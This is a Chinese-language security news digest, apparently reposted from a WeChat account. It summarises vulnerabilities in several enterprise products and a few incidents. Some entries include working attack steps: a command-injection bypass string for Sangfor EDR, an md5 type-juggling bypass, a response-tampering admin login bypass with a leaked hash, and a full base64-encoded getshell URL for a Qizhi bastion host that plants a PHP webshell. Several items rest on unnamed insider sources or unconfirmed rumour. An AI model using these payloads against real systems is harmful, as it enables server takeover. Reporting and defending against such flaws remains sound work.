大事记-911

  • A+
所属分类:安全文章

前言

昨日事,今日毕。大事记-911 别问,问就是不晓得!

大事记-911

一、SX服EDR-RCE

详情:

旧版本存在严重漏洞,可直接RCE获取服务器权限。

详情摘录:

dev_linkage_launch.php为设备联动的新入口点主要是将联动的接口构造成业务统一处理的接口。

通过nginx规则可以得知,他们没有设置禁止外网访问.从而可以直接访问/api/edr/sangforinter/v2/xxx 绕过 第一个检查。

if($md5_str == $json_token["md5"]) 引发第二个漏洞: php弱类型导致的漏洞,绕过只需要传入一个base64编码的json内容为 {“md5”:true}即可。

process_cssp.php文件存在任意指令执行漏洞.作者试图使escapeshellarg函数去给单引号打反斜杠实际上是毫无作用的。

绕过:{"params":"w=123"'1234123'"|命令"}大事记-911

【影响版本】 EDR 3.2.21版本-2020年7月3日发布

【安全版本】 听过sxf内部起了个计划,正在重构代码。

信息来源:

该漏洞首发于2020年9月4日NEO战队公众号。

大事记-911


二、WPS-Office图片解析错误导致堆损坏-RCE

详情:

     该漏洞发现于2020年8月,目前官方已经修复。WPS-Office软件中存在一个远程执行代码漏洞,是当Office软件在分析特制Office文件时不正确地处理内存中的对象时引起的。成功利用此漏洞的攻击者可以在当前用户的上下文中运行任意代码。故障可能会导致拒绝服务。在WPS Office中用于图像格式解析的Qt模块中发现堆损坏。嵌入WPS-office的特制图像文件可能会触发此漏洞。打开特制的文档文件时,触发访问冲突。

网传图片疑似是word的,非WPS。

大事记-911

【影响版本】 11.2.0.9453。时间历程如下

2020年08月04日 向公开提供的WPS的各种邮件列表(销售和支持)发送电子邮件。
2020年8月10日    WPS团队回复,报告可转发给他们。
2020年8月11日    询问更多信息,如咨询和向适当渠道披露等。
2020年8月17日    根据之前的要求与WPS团队跟进。
2020年8月18日    WPS团队回应称,他们将负责此事并转交给开发团队。
2020年08月18日  通过电子邮件(不加密)提供技术报告和概念证明。
2020年8月25日    与WPS跟进报告进度。
2020年08月26日  WPS更新称问题已转发给开发团队。
2020年8月28日    WPS发了一封电子邮件,称该问题已在最新下载版本11.2.0.9403中修复。
2020年08月28日   根据提供的PoC测试新版本,并确认问题已修复。
2020年8月28日     向WPS团队咨询或更改更新日志。
2020年8月31日     WPS团队通知他们不再更新或维护任何安全咨询。
2020年09月03日   申报CVE。


【安全版本】 该问题已在最新下载版本11.2.0.9403中修复

信息来源:

http://zeifan.my/security/rce/heap/2020/09/03/wps-rce-heap.html


三、齐治堡垒机服务端前台RCE-CNVD-2019-20835

详情:

齐治运维堡垒机服务端存在命令执行漏洞,攻击者可利用该漏洞获取服务器权限。无需登录先访问:http://10.20.10.11/listener/cluster_manage.php,返回OK,确认漏洞存在。然后访问链接:

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}
即可getshell,执行成功后,生成PHP一句话马 /var/www/shterm/resources/qrcode/lbj77.php 密码10086,使用BASE64进行编码。

修复建议: 厂商已提供修复方案,请关注厂商主页更新:https://www.shterm.com

信息来源:

https://www.cnvd.org.cn/flaw/show/1632201

https://www.cnblogs.com/StudyCat/p/11256944.html


四、绿盟UTS综合威胁探针管理员任意登录

详情:

综合评判,该漏洞在实际攻击过程中,造成的危害较低。探针设备一般旁路部署在内网核心交换机。且仅为探针的WEB管理员权限。

绿盟全流量威胁分析解决方案针对原始流量进行采集和监控,对流量信息进行深度还原、存储、查询和分析,可以及时掌握重要信息系统相关网络安全威胁风险,及时检测漏洞、病毒木马、网络攻击情况,及时发现网络安全事件线索,及时通报预警重大网络安全威胁,调查、防范和打击网络攻击等恶意行为,保障重要信息系统的网络安全。

漏洞利用过程:大事记-911大事记-911

对响应包进行修改,将false更改为true的时候可以泄露管理用户的md5值密码大事记-911大事记-911大事记-911

利用渠道的md5值去登录页面,7ac301836522b54afcbbed714534c7fb大事记-911
大事记-911大事记-911

成功登录,登录后通过管理员权限对设备进行管控,并且可以看到大量的攻击信息,泄露内部网络地址包括资产管理。

【影响版本】 绿盟综合威胁探针设备版本V2.0R00F02SP02及之前版本

修复建议:听建议尽快更新补丁至最新版本

http://update.nsfocus.com/update/listBsaUtsDetail/v/F02

信息来源:

圈内。


五、天融信TopApp-LB负载均衡系统-SQL注入

详情:

天融信该系统早年间,存在大量漏洞。并且由于此类网络设备经常安全更新不及时,至今依然存在大量问题。请移步至WooY**镜像站查看。

本次详情如下:

大事记-911

信息来源:

圈内。


六、用友GRP-u8存在SQL注入

详情:

此处SQL注入可直接利用xp_cmdshell 扩展存储过程将命令字符串作为操作系统命令执行。下图复现使用本地测试,切勿进行未授权测试。

大事记-911

大事记-911

修复建议:参考常用SQL注入防护方案进行临时修复。

信息来源:

圈内。


七、联软终端准入安全漏洞事件

详情:

暂未有详情披露!

信息来源:

圈内。


八、蜜罐安全事件

详情:

网传某厂商蜜罐直连内网,被穿后导致某省D信...。有说法为长亭谛听或是默安幻阵或是启明星辰蜜罐。

目前有默安出来辟谣,暂未有其他厂商消息大事记-911大事记-911

蜜罐部署防护建议:

  1. 内、外网蜜罐分布部署。

  2. 采用逻辑隔离等方式限制蜜罐可能被攻破后的网络访问权限。

  3. 无论是诱导还是反制,都应该在现有人力足够的情况下酌情部署监控。

信息来源:

未证实消息来源,切勿谣传。


九、今日监测国内多处发生钓鱼邮件事件

详情:

今日国内发现多起钓鱼邮件,多以超链接形式含在邮件正文内。收到邮件后,切勿盲目点击不可信的一切来源。包括超链接、附件、联系方式非官方下载地址等。在收到疑似钓鱼邮件时,应及时向上汇报情况,等待专人处理。除需注意可执行文件附件外,仍需注意HTML等文本格式文档、ZIP等压缩包形式文件。另,需警惕APT攻击混杂其中!

信息来源:

圈内。


人到中年不得已,保温杯里泡枸杞。注意养生,身体最重要。

新的一天又来了,大家继续努力!

原文始发于微信公众号(一溪风月不如云子闲敲):大事记-911

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: